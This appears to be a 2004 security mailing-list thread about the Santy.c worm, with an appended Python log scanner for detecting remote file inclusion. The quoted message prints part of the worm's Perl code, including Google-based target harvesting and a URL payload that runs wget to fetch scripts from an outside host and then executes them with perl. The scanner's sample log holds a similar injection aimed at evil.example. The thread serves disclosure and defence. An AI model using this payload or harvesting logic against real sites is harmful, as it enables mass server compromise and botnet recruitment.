
Re: New Santy-Worm attacks *all* PHP-skripts ( Santy.c ? )



In-Reply-To: <Pine.LNX.4.58.0412251805110.19888@xxxxxxxxxxxxxxxx>

The kids are exploiting the PHP file inclusion (programming flaw), well-thought-out.

Thousands of vulnerable sites and potentially thousands of zombies...

We labelled this Santy.c (even if the only similarity with Santy lies in "using 
search engines").

http://www.k-otik.com/exploits/20041225.SantyC.php
http://www.k-otik.com/exploits/20041225.SantyB.php

Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com 


>From: Juergen Schmidt <ju@xxxxxxxxx>
>
>Hello,
>
>The new Santy version not only attacks phpBB.
>
>It uses the Brazilian Google site to find all kinds of PHP scripts.
>It parses their URLs and overwrites variables with strings like:
>
>'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
>www.visualcoders.net/spybot.txt;...
>
>Often enough this leads to download and execution of code.
>On success the worm connects to an IRC server, where already more than 700
>zombies are waiting for commands.
>
>The relevant code:
>---------
>$procura = 'inurl:*.php?*=' . $numr;
>
>for($n=0;$n<900;$n += 10){
>$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort =>
>80, Proto => "tcp") or next;
>print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
>...
>
>$lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
>www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget
>www.visualcod
>ers.net/php.txt;wget www.visualcoders.net/ownz.txt;wget
>www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl
>ownz.txt;perl php.txt';
>$t =0;
>$y =0;
>@ja;
>open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
>while (<opa>)
>{
> $ja[$t] = $_;
> chomp $ja[$t];
> $t++;
> $y++;
>}
>close(opa);
>$t=1;
>while ($t < $y)
>   {
>    if ($ja[$t] =~/=/)
>      {
>       $num = rindex $ja[$t], '=';
>       $num += 1;
>       $ja[$t] = substr($ja[$t],0,$num);
>            open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar
>caxe1.txt";
>            print jaera "$ja[$t]$lista1\n";
>            close(jaera);
>        $num = index $ja[$t], '=';
>        $num += 1;
>        $ja[$t] = substr($ja[$t],0,$num);
>        $num1 = rindex $ja[$t], '.';
>        $subproc = substr($ja[$t],$num1,$num);
>
>            open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar
>caxe1.txt";
>            print jaera "$ja[$t]$lista1\n";
>            close(jaera);
>      }
>     $t++;
>     }
>
>
>bye, ju
>
>-- 
>Juergen Schmidt       Chefredakteur  heise Security     www.heisec.de
>Heise Zeitschriften Verlag,    Helstorferstr. 7,       D-30625 Hannover
>Tel. +49 511 5352 300      FAX +49 511 5352 417       EMail ju@xxxxxxxxx
>GPG-Key: 0x38EA4970,  5D7B 476D 84D5 94FF E7C5  67BE F895 0A18 38EA 4970
>
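A defender-side check for the pattern Juergen describes above (a script variable in the query string overwritten with a remote location), added here as an example and not part of either message: it scans Apache combined-format access-log lines and reports query parameters whose value is a URL on a host other than our own. The log lines, the hosts in them and the local_hosts allow-list are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache combined format); hosts are fictitious.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Dec/2004:18:05:11 +0100] "GET /news.php?page=3 HTTP/1.0" 200 4127 "-" "Mozilla/4.0"
203.0.113.9 - - [25/Dec/2004:18:05:12 +0100] "GET /index.php?page=http://evil.example/spy.gif?&cmd=cd%20/tmp;wget%20evil.example/x.txt HTTP/1.0" 200 512 "-" "lwp-trivial/1.41"
198.51.100.4 - - [25/Dec/2004:18:05:13 +0100] "GET /gallery.php?img=pic01.jpg HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
198.51.100.5 - - [25/Dec/2004:18:05:14 +0100] "GET /shop.php?return=https://www.example.com/thanks HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Only the fields needed here: client address and the request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def find_rfi_attempts(log_text, local_hosts=("www.example.com",)):
    """Return (client_ip, parameter, remote_host) for each request in which a
    query parameter carries a URL pointing at a host outside local_hosts.
    That is the shape a remote-file-inclusion worm produces when it replaces
    a script variable with the address of its payload."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(m.group("target")).query
        # keep_blank_values so a trailing "?&cmd=..." does not hide the first parameter
        for name, value in parse_qsl(query, keep_blank_values=True):
            if not value.lower().startswith(REMOTE_SCHEMES):
                continue
            host = urlsplit(value).hostname or ""
            if host not in local_hosts:  # our own redirect targets are expected
                hits.append((m.group("ip"), name, host))
    return hits


if __name__ == "__main__":
    for ip, param, host in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ip}: parameter '{param}' points at remote host {host}")
```

The allow-list matters: legitimate return-URL parameters pointing back at your own site would otherwise show up alongside the worm traffic.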